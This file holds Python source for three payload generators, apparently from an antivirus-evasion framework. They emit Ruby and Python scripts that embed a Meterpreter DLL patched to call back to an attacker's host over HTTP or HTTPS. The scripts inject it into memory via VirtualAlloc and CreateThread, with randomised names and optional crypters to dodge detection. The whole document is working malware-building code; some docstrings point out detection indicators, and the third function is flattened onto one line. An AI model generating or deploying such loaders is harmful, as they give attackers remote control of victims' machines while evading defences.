def generate(self) -> str:
    """Build the Ruby source for a reverse-HTTPS Meterpreter stager.

    The returned string is a standalone Ruby script.  It embeds the patched
    Meterpreter DLL (compressed and base64-encoded by helpers.deflate()),
    inflates it at runtime with a negative-window-bits Zlib stream, and then
    executes it in-process through win32/api calls to VirtualAlloc,
    RtlMoveMemory, CreateThread and WaitForSingleObject.

    Per-call randomisation covers only the Ruby identifiers (variable and
    function names).  The `require`/`include` line, the `:Ocra` guard, the
    four Win32 API name strings, the PAGE_EXECUTE_READWRITE allocation
    (0x40) and the hard-coded User-Agent patched into the DLL are constant
    across generations and are the pieces a detection engineer can key on.

    Reads:  self.required_options['LHOST'][0], ['LPORT'][0]
    Returns: str -- the generated Ruby script (the crypter step is
             commented out in this variant, so the script is returned as-is).
    """
    # get the main meterpreter .dll with the header/loader patched
    meterpreterDll = patch.headerPatch()
    # turn on SSL (this is the HTTPS variant; the URL below uses https://)
    meterpreterDll = patch.patchTransport(meterpreterDll, True)
    # replace the URL; the trailing "\x00" NUL-terminates the C string inside the DLL
    urlString = "https://" + self.required_options['LHOST'][0] + ":" + str( self.required_options['LPORT'] [0]) + "/" + helpers.genHTTPChecksum() + "/\x00"
    meterpreterDll = patch.patchURL(meterpreterDll, urlString)
    # replace in the UA -- fixed string, NUL-terminated; a stable network indicator
    meterpreterDll = patch.patchUA( meterpreterDll, "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00")
    # compress/base64 encode the dll
    compressedDll = helpers.deflate(meterpreterDll)
    # actually build out the payload
    payloadCode = ""
    payloadCode = "require 'rubygems';require 'win32/api';require 'socket';require 'base64';require 'zlib';include Win32\n"
    # Ruby-side guard: exit when the Ocra constant is defined (presumably to
    # avoid running while being packed by the Ocra ruby-to-exe tool -- verify)
    payloadCode += "exit if Object.const_defined?(:Ocra)\n"
    # randomly generate out variable names
    payloadName = helpers.randomString().lower()
    ptrName = helpers.randomString().lower()
    threadName = helpers.randomString().lower()
    Shellcode = helpers.randomString().lower()
    randInflateFuncName = helpers.randomString().lower()
    randb64stringName = helpers.randomString().lower()
    randVarName = helpers.randomString().lower()
    # deflate function: base64-decode, then inflate with -MAX_WBITS (raw stream, no zlib header)
    payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + ")\n"
    payloadCode += " " + randVarName + " = Base64.decode64(" + randb64stringName + ")\n"
    payloadCode += " zstream = Zlib::Inflate.new(-Zlib::MAX_WBITS)\n"
    payloadCode += " buf = zstream.inflate(" + randVarName + ")\n"
    payloadCode += " zstream.finish\n"
    payloadCode += " zstream.close\n"
    payloadCode += " return buf\n"
    payloadCode += "end\n\n"
    # the whole encoded DLL is inlined as one string literal in the script
    payloadCode += Shellcode + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
    # win32/api prototypes -- the API name strings are literal and constant
    payloadCode += "v = API.new('VirtualAlloc', 'IIII', 'I');r = API.new('RtlMoveMemory', 'IPI', 'V');c = API.new('CreateThread', 'IIIIIP', 'I');w = API.new('WaitForSingleObject', 'II', 'I')\n"
    payloadCode += "%s = %s\n" % (payloadName, Shellcode)
    # VirtualAlloc(NULL, max(len, 0x1000), MEM_COMMIT (0x1000), PAGE_EXECUTE_READWRITE (0x40))
    payloadCode += "%s = v.call(0,(%s.length > 0x1000 ? %s.length : 0x1000), 0x1000, 0x40)\n" % ( ptrName, payloadName, payloadName)
    # copy into the RWX region, start a thread at its base, then wait on the thread
    payloadCode += "x = r.call(%s,%s,%s.length); %s = c.call(0,0,%s,0,0,0); x = w.call(%s,0xFFFFFFF)\n" % ( ptrName, payloadName, payloadName, threadName, ptrName, threadName)
    #if self.required_options["USE_CRYPTER"][0].lower() == "y":
    #    payloadCode = encryption.rubyCrypter(payloadCode)
    return payloadCode
def generate(self) -> str:
    """Build the Ruby source for a reverse-HTTP Meterpreter stager.

    Identical in structure to the HTTPS variant except that the transport
    patch is applied with False and the URL uses plain http://.  The output
    is a standalone Ruby script that embeds the patched Meterpreter DLL
    (compressed and base64-encoded by helpers.deflate()), inflates it at
    runtime, and executes it in-process via win32/api calls to VirtualAlloc,
    RtlMoveMemory, CreateThread and WaitForSingleObject.

    Only the Ruby identifiers are randomised per call; the `require` line,
    the `:Ocra` guard, the Win32 API name strings, the 0x40
    (PAGE_EXECUTE_READWRITE) allocation and the patched User-Agent are
    constant and remain usable as static/network indicators.

    Reads:  self.required_options['LHOST'][0], ['LPORT'][0],
            ["USE_CRYPTER"][0]
    Returns: str -- the Ruby script, passed through encryption.rubyCrypter()
             when USE_CRYPTER is "y" (case-insensitive).
    """
    # get the main meterpreter .dll with the header/loader patched
    meterpreterDll = patch.headerPatch()
    # SSL off: plain-HTTP transport (the original comment said "turn on", but
    # the flag is False and the URL below is http://)
    meterpreterDll = patch.patchTransport(meterpreterDll, False)
    # replace the URL; trailing "\x00" NUL-terminates the string inside the DLL
    urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + helpers.genHTTPChecksum() + "/\x00"
    meterpreterDll = patch.patchURL(meterpreterDll, urlString)
    # replace in the UA -- fixed, NUL-terminated string; a stable network indicator
    meterpreterDll = patch.patchUA(meterpreterDll, "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00")
    # compress/base64 encode the dll
    compressedDll = helpers.deflate(meterpreterDll)
    # actually build out the payload
    payloadCode = ""
    payloadCode = "require 'rubygems';require 'win32/api';require 'socket';require 'base64';require 'zlib';include Win32\n"
    # Ruby-side guard: exit when the Ocra constant is defined (presumably to
    # avoid running while being packed by the Ocra ruby-to-exe tool -- verify)
    payloadCode += "exit if Object.const_defined?(:Ocra)\n"
    # randomly generate out variable names
    payloadName = helpers.randomString().lower()
    ptrName = helpers.randomString().lower()
    threadName = helpers.randomString().lower()
    Shellcode = helpers.randomString().lower()
    randInflateFuncName = helpers.randomString().lower()
    randb64stringName = helpers.randomString().lower()
    randVarName = helpers.randomString().lower()
    # deflate function: base64-decode, then inflate with -MAX_WBITS (raw stream, no zlib header)
    payloadCode += "def "+randInflateFuncName+"("+randb64stringName+")\n"
    payloadCode += " " + randVarName + " = Base64.decode64("+randb64stringName+")\n"
    payloadCode += " zstream = Zlib::Inflate.new(-Zlib::MAX_WBITS)\n"
    payloadCode += " buf = zstream.inflate("+ randVarName +")\n"
    payloadCode += " zstream.finish\n"
    payloadCode += " zstream.close\n"
    payloadCode += " return buf\n"
    payloadCode += "end\n\n"
    # the whole encoded DLL is inlined as one string literal in the script
    payloadCode += Shellcode + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
    # win32/api prototypes -- the API name strings are literal and constant
    payloadCode += "v = API.new('VirtualAlloc', 'IIII', 'I');r = API.new('RtlMoveMemory', 'IPI', 'V');c = API.new('CreateThread', 'IIIIIP', 'I');w = API.new('WaitForSingleObject', 'II', 'I')\n"
    payloadCode += "%s = %s\n" %(payloadName, Shellcode)
    # VirtualAlloc(NULL, max(len, 0x1000), MEM_COMMIT (0x1000), PAGE_EXECUTE_READWRITE (0x40))
    payloadCode += "%s = v.call(0,(%s.length > 0x1000 ? %s.length : 0x1000), 0x1000, 0x40)\n" %(ptrName,payloadName,payloadName)
    # copy into the RWX region, start a thread at its base, then wait on the thread
    payloadCode += "x = r.call(%s,%s,%s.length); %s = c.call(0,0,%s,0,0,0); x = w.call(%s,0xFFFFFFF)\n" %(ptrName,payloadName,payloadName,threadName,ptrName,threadName)
    # optional post-processing of the script text by the Ruby crypter
    if self.required_options["USE_CRYPTER"][0].lower() == "y":
        payloadCode = encryption.rubyCrypter(payloadCode)
    return payloadCode
def generate(self): # get the main meterpreter .dll with the header/loader patched meterpreterDll = patch.headerPatch() # turn off SSL meterpreterDll = patch.patchTransport(meterpreterDll, False) # replace the URL urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + helpers.genHTTPChecksum() + "/\x00" meterpreterDll = patch.patchURL(meterpreterDll, urlString) # replace in the UA meterpreterDll = patch.patchUA(meterpreterDll, "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00") # compress/base64 encode the dll compressedDll = helpers.deflate(meterpreterDll) # actually build out the payload payloadCode = "" # traditional void pointer injection if self.required_options["inject_method"][0].lower() == "void": # doing void * cast payloadCode += "from ctypes import *\nimport base64,zlib\n" randInflateFuncName = helpers.randomString() randb64stringName = helpers.randomString() randVarName = helpers.randomString() # deflate function payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n" payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n" randVarName = helpers.randomString() randFuncName = helpers.randomString() payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n" payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n" payloadCode += randFuncName+"()\n" # VirtualAlloc() injection else: payloadCode += 'import ctypes,base64,zlib\n' randInflateFuncName = helpers.randomString() randb64stringName = helpers.randomString() randVarName = helpers.randomString() randPtr = helpers.randomString() randBuf = helpers.randomString() randHt = helpers.randomString() # deflate function payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n" payloadCode += 
"\treturn zlib.decompress( "+randVarName+" , -15)\n" payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n" payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n' payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n' payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": payloadCode = encryption.pyherion(payloadCode) return payloadCode